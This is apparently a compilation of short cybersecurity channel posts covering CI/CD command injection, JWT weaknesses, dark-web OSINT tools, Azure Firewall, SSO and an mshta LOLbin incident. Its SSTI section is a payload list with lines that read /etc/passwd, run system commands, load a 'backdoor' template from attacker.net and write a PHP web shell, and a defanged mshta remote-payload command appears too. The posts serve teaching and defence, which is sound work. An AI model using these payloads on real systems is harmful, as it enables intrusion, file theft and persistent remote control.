🦑𝐇𝐨𝐰 𝐀𝐭𝐭𝐚𝐜𝐤𝐞𝐫𝐬 𝐇𝐚𝐜𝐤 𝐂𝐈/𝐂𝐃 𝐏𝐢𝐩𝐞𝐥𝐢𝐧𝐞𝐬 👇

I recently watched one of DEFCON's talk of this year "Your CI CD Pipeline Is Vulnerable, But It's Not Your Fault" by Elad Pticha, Oreen Livni and was really impressed by the attack vector (link in comments)

𝐋𝐞𝐭'𝐬 𝐬𝐞𝐞 𝐡𝐨𝐰 𝐢𝐭 𝐰𝐨𝐫𝐤𝐬

Github workflows are part of the CI/CD (Continous Integration/Continous Deployment) ecosystem that lets developers automate their workflow

For example: once a commit is made to the repo -> the code is scanned with a tool -> if the tests pass -> code is pushed to test/production

Now the interesting part is that (if the repo maintainer uses input that you control) inside the workflow, this can lead to command injection in the pipeline

𝐖𝐡𝐢𝐜𝐡 𝐦𝐞𝐚𝐧𝐬 𝐲𝐨𝐮 𝐦𝐚𝐲 𝐛𝐞 𝐚𝐛𝐥𝐞 𝐭𝐨 𝐭𝐚𝐤𝐞 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐫𝐞𝐩𝐨

In the example bellow, the pipeline uses the title of an issue as part of a bash echo command

That means anyone can create a issue named $(𝐰𝐡𝐨𝐚𝐦𝐢) and execute commands in the CI/CD

If you can do that -> you can abuse the command injection to steal the repo's Github token, read secrets or push malicious code

Ref: Andrei Agape
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🔐Cracking the Secrets of JWT Hacking 🔍

Are you ready to uncover the vulnerabilities in JSON Web Tokens (JWTs) and learn how to secure them effectively? 🌐 Here’s a detailed guide on JWT hacking and best practices to safeguard them:

💡 Common JWT Vulnerabilities:

1️⃣ Weak Signing Algorithm (e.g., none): Exploiting algorithms like HS256 or RS256 with insecure configurations.
2️⃣ Key Disclosure: Using predictable or publicly exposed keys for token signing.
3️⃣ JWT Manipulation: Modifying the header or payload to escalate privileges or bypass authentication.
4️⃣ Lack of Expiration: Tokens without expiry enable unauthorized access for extended periods.
5️⃣ Insufficient Signature Validation: Failure to properly validate JWT signatures.

🛠️ JWT Hacking Techniques:
• Header Tampering: Altering the algorithm to “none” to bypass signature verification.
• Key Cracking: Brute-forcing weak or mismanaged secrets.
• Replay Attacks: Reusing captured tokens to impersonate users.
• Payload Tampering: Modifying claims (e.g., admin: true) to escalate privileges.
• Algorithm Downgrade Attacks: Switching from a strong algorithm (RS256) to a weaker one (HS256) if the server mishandles keys.
• Client-Side Storage Exploitation: Stealing tokens stored in localStorage or sessionStorage via XSS.

✅ How to Secure JWTs:

🔒 Use Strong Algorithms: Always use strong algorithms like RS256 with secure key management.
⏳ Set Expiry Times: Define short-lived tokens with the exp claim to reduce exposure.
📜 Enforce Algorithm Validation: Ensure the server validates the specified algorithm and rejects “none.”
🔑 Implement Secure Key Storage: Store signing keys securely (e.g., in environment variables or vaults).
🔍 Monitor Token Usage: Log and monitor API requests for anomalies or unusual token behavior.
🔄 Rotate Secrets Regularly: Frequently update your keys to limit exposure in case of leaks.
🧱 Protect Client-Side Storage: Use HTTP-only, Secure cookies instead of localStorage or sessionStorage.

💻 Top Tools for JWT Testing:

🛠️ jwt.io – Decode, debug, and test tokens.
🛠️ Burp Suite – Intercept API requests and test JWT-based flows.
🛠️ Postman – Manual testing for API endpoints using JWT.
🛠️ HackTools – A browser extension with JWT cracking utilities.
🛠️ John the Ripper – Brute-force JWT secrets.
🛠️ JARM Tool – Analyze JWT for misconfigurations and vulnerabilities.

🔗 Additional Tips:

🔵 Avoid storing sensitive data directly in the JWT payload, even if encrypted.
🔵 Validate tokens at every API endpoint.
🔵 Beware of Cross-Site Scripting (XSS) attacks that could expose JWTs.

🔐 JSON Web Tokens (JWTs) are powerful tools for modern applications, but they come with risks. Whether you’re a developer or penetration tester, mastering JWT security is critical for keeping your systems safe. 🚀

Ref: in pdf
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑OSINT Tools for the Dark Web:

Dark Web Search Engine Tools
Katana - https://github.com/adnane-X-tebbaa/Katana

OnionSearch - https://github.com/megadose/OnionSearch

Darkdump - https://github.com/josh0xA/darkdump

Ahmia Search Engine - ahmia.fi, https://github.com/ahmia/ahmia-site

Darkus - https://github.com/Lucksi/Darkus

Tools to get onion links
Hunchly - https://www.hunch.ly/darkweb-osint/

Tor66 - http://tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh

Darkweblink - darkweblink.com, http://dwltorbltw3tdjskxn23j2mwz2f4q25j4ninl5bdvttiy4xb6cqzikid.onion

Tools to scan onion links
Onionscan - https://github.com/s-rah/onionscan

Onioff - https://github.com/k4m4/onioff

Onion-nmap - https://github.com/milesrichardson/docker-onion-nmap

Tools to crawl data from the Dark Web
TorBot - https://github.com/DedSecInside/TorBot

TorCrawl - https://github.com/MikeMeliz/TorCrawl.py

VigilantOnion - https://github.com/andreyglauzer/VigilantOnion

OnionIngestor - https://github.com/danieleperera/OnionIngestor

Darc - https://github.com/JarryShaw/darc

Midnight Sea - https://github.com/RicYaben/midnight_sea

Prying Deep - https://github.com/iudicium/pryingdeep

Miscellaneous
DeepDarkCTI - https://github.com/fastfire/deepdarkCTI

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🟥🟥Azure Firewall 🟥🟥

🚀 Azure Firewall is a stateful, cloud-native network security service designed to secure your Azure workloads and ensure compliance in today’s threat-laden digital landscape.

🔑 Key Features You Need to Know:
1️⃣ Application and Network Rule Filtering
• Define rules based on FQDNs, ports, and protocols to control inbound and outbound traffic.
• Layer 7 filtering for advanced application-level protection.

2️⃣ Threat Intelligence-Based Filtering
• Leverage Microsoft Threat Intelligence to block malicious IPs and domains automatically.
• Get real-time threat updates for proactive defense.

3️⃣ Built-in High Availability
• No need for load balancers—Azure Firewall is built for redundancy and 99.95% SLA.

4️⃣ Dynamic Scalability
• Scales automatically to handle high traffic volumes, ensuring uninterrupted security.

5️⃣ Centralized Policy Management
• Manage security policies across multiple Azure Firewalls using Azure Firewall Manager.

6️⃣ Logging and Analytics
• Monitor traffic patterns with deep logging and analytics in Azure Monitor and Sentinel.

7️⃣ Hybrid and Multi-Cloud Support
• Secure traffic between on-premises, Azure, and other cloud providers using ExpressRoute and VPN Gateway.

💡 Advanced Scenarios with Azure Firewall:
✔ Network Address Translation (NAT): Protect public-facing services with DNAT/SNAT rules.
✔ Integration with Private Link: Secure connections to Azure PaaS services.
✔ Zero Trust Network Security: Enforce strict segmentation and access controls.

📈 Why Choose Azure Firewall?
🔒 Enterprise-grade security with TLS inspection and IDPS (Intrusion Detection & Prevention System).
🌍 Globally distributed for large-scale enterprise needs.
⚡ Effortless integration with Azure Security Center, Azure Virtual WAN, and Third-party SIEM tools.

Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Master Cybersecurity Awareness: Protect Yourself in the Digital World!

In the ever-evolving digital landscape, cyber threats are becoming increasingly sophisticated. Whether you’re an individual user or a professional, understanding cybersecurity is crucial to protecting your data, privacy, and assets.

📖 The Cybersecurity Awareness Handbook is your one-stop guide to safeguarding your online presence. Here’s what it covers:

🔐 Key Insights in the Handbook

1️⃣ Understanding Cyber Threats
• Learn about phishing, ransomware, malware, and social engineering attacks.
• Understand how attackers exploit vulnerabilities in systems and human behavior.

2️⃣ Building Strong Cyber Defenses
• Create robust passwords and implement multi-factor authentication (MFA).
• Discover the importance of regular software updates and patch management.

3️⃣ Safe Online Practices
• Tips for secure online shopping and social media usage.
• Identifying fake websites and avoiding harmful downloads.

4️⃣ Incident Response Plans
• Step-by-step guidance on responding to data breaches or system compromises.
• Learn about reporting cybercrimes and recovering from attacks.

5️⃣ Empowering Your Workplace
• Tips for creating a cybersecurity culture in professional environments.
• How employees can become the first line of defense against cyber threats.

💡 Why You Need This Handbook
• Stay Ahead of Threats: Cybersecurity is evolving daily; this guide keeps you informed.
• Actionable Tips: Practical steps to implement immediately for better security.
• Comprehensive Knowledge: From basic concepts to advanced strategies, it’s all here.

🛡 Ready to strengthen your cybersecurity skills?
Download the Cybersecurity Awareness Handbook now and take charge of your online safety.

Ref: Mahesh Girhe
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

How Hackers Exploit RDP Proxies in Sophisticated MiTM Attacks

🦑 Secure Code Review Challenge 16:

The goal of this challenge is to pop a shell 🐚 and then provide concrete code-level remediation guidance on how to fix the vulnerability.

You can run the challenge on your machine by cloning the GitHub repo > GET <, navigating into './challenge-16', and running 'docker-compose up'.

Ref: Florian WalterFlorian Walter
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Account Takeover Techniques: Critical Vulnerabilities Mindmap" ?

Account takeover (ATO) is a critical vulnerability that can compromise sensitive user data and system integrity. This mindmap outlines various ATO techniques, including:

IDOR in Password Reset

Password Reset Poisoning

Mass Assignment

OAuth Misconfigurations

Improper Rate-Limit Checks etc...........

Ref: AMIT KUMAR
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE courses to boost your skills! 📈

1. Splunk Courses
lnkd.in/d_dZNduf
2. Fortinet Courses
lnkd.in/dmmkZ-tH
3. AttackIQ MITRE ATT&CK Courses
lnkd.in/dcfmSPEJ
4. Microsoft SC-200 Course
lnkd.in/dbCn3k4n
5. Awesome OSINT Courses
lnkd.in/dTCaCf-u
6. CSILinux Forensic Trainings
lnkd.in/dhjwx_5h

Ref: Mohamed Hamdi
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New SSTI (Server Side Template Injection) - Payloads

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

Ref: Aman Dara
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 LOLbins attacks :

mshta.exe is a legitimate system executable included in Microsoft Windows. It stands for Microsoft HTML Application Host, and its primary purpose is to execute HTML Applications (HTA files). These HTA files are standalone applications that use HTML, JavaScript, VBScript, or other scripting languages.

During an incident response exercise, we identified a sophisticated adversary leveraging Living-Off-The-Land Binaries (LOLBins) to perform malicious actions. They used PowerShell to execute commands, minimizing their footprint and evading detection.

The activity was flagged when Windows Defender logged multiple Event ID 4104 entries in the Microsoft-Windows-PowerShell/Operational log.

Note : These logs revealed suspicious PowerShell commands executing obfuscated scripts.

Further investigation uncovered the use of mshta.exe to load a remote payload via a seemingly legitimate URL.

Key points:
Attackers frequently abuse mshta.exe as part of Living-Off-The-Land Binaries (LOLBins) because:

1>Bypasses Security Controls:
Since it's a legitimate system utility, some security tools may not flag its use as suspicious.
2>Remote Code Execution:
mshta.exe can execute malicious scripts hosted remotely, allowing attackers to deliver payloads via URLs.

Sample Code : mshta.exe "hzzp://malicious-domain[.]com/payload[.]hta"

hashtag#incidentresponse hashtag#dfir hashtag#soc hashtag#cybersecurity hashtag#mitre hashtag#attack hashtag#windows

Ref: Soumick kar
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

𝐒𝐀𝐌𝐀 𝐂𝐲𝐛𝐞𝐫𝐬𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐀𝐮𝐝𝐢𝐭 𝐂𝐡𝐞𝐜𝐤𝐥𝐢𝐬𝐭

🦑SSO (Single Sign-On) Explained.

SSO can be thought of as a master key to open all different locks. It allows a user to log in to different systems using a single set of credentials.

In a time where we are accessing more applications than ever before, this is a big help to mitigate password fatigue and streamlines user experience.

To fully understand the SSO process, 𝗹𝗲𝘁’𝘀 𝘁𝗮𝗸𝗲 𝗮 𝗹𝗼𝗼𝗸 𝗮𝘁 𝗵𝗼𝘄 𝗮 𝘂𝘀𝗲𝗿 𝘄𝗼𝘂𝗹𝗱 𝗹𝗼𝗴 𝗶𝗻𝘁𝗼 𝗟𝗶𝗻𝗸𝗲𝗱𝗜𝗻 𝘂𝘀𝗶𝗻𝗴 𝗚𝗼𝗼𝗴𝗹𝗲 𝗮𝘀 𝘁𝗵𝗲 𝗶𝗱𝗲𝗻𝘁𝗶𝘁𝘆 𝗽𝗿𝗼𝘃𝗶𝗱𝗲𝗿:

𝟭) 𝗨𝘀𝗲𝗿 𝗿𝗲𝗾𝘂𝗲𝘀𝘁𝘀 𝗮𝗰𝗰𝗲𝘀𝘀

First, the user would attempt to access the Service Provider (LinkedIn). At this point, a user would be presented with login options, and in this example, they would select "Sign in with Google".

𝟮) 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗿𝗲𝗾𝘂𝗲𝘀𝘁

From here, the Service Provider (LinkedIn) will redirect the user to the Identity Provider (Google) with an authentication request.

𝟯) 𝗜𝗱𝗣 𝗰𝗵𝗲𝗰𝗸𝘀 𝗳𝗼𝗿 𝗮𝗰𝘁𝗶𝘃𝗲 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Once the Identity Provider (Google) has received the request, it will check for an active session. If it doesn't find one, authentication will be requested.

𝟰) 𝗨𝘀𝗲𝗿 𝘀𝘂𝗯𝗺𝗶𝘁𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

At this stage, the user will submit their login credentials (username and password) to the Identity Provider (IdP).

𝟱) 𝗜𝗱𝗣 𝘃𝗲𝗿𝗶𝗳𝗶𝗲𝘀 𝗰𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹𝘀

The Identity Provider will then verify the submitted credentials against its User Directory (database). If the credentials are correct, the IdP will create an authentication token or assertion.

𝟲) 𝗜𝗱𝗣 𝘀𝗲𝗻𝗱𝘀 𝘁𝗼𝗸𝗲𝗻 𝘁𝗼 𝗦𝗲𝗿𝘃𝗶𝗰𝗲 𝗣𝗿𝗼𝘃𝗶𝗱𝗲𝗿

Once the token or assertion has been created, the IdP sends it back to the Service Provider confirming the user's identity. The user is now authenticated and can access the Service Provier (LinkedIn).

𝟳) 𝗔𝗰𝗰𝗲𝘀𝘀 𝗴𝗿𝗮𝗻𝘁𝗲𝗱 𝘂𝘀𝗶𝗻𝗴 𝗲𝘅𝗶𝘀𝘁𝗶𝗻𝗴 𝘀𝗲𝘀𝘀𝗶𝗼𝗻

Since the Identity Provider has established a session, when the user goes to access a different Service Provider (eg; GitHub), they won't need to re-enter their credentials. Future service providers will request authentication from the Identity Provider, recognize the existing session, and grant access to the user based on the previously authenticated session.

SSO workflows like the above operate on SSO protocols, which are a set of rules that govern how the IdP and SP communicate and trust each other. Common protocols include Security Assertion Markup Language (SAML), OpenID Connect, and OAuth.

💭 What's your favourite way to go about authentication? 💬

Ref: Nikki SiapnoNikki Siapno
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁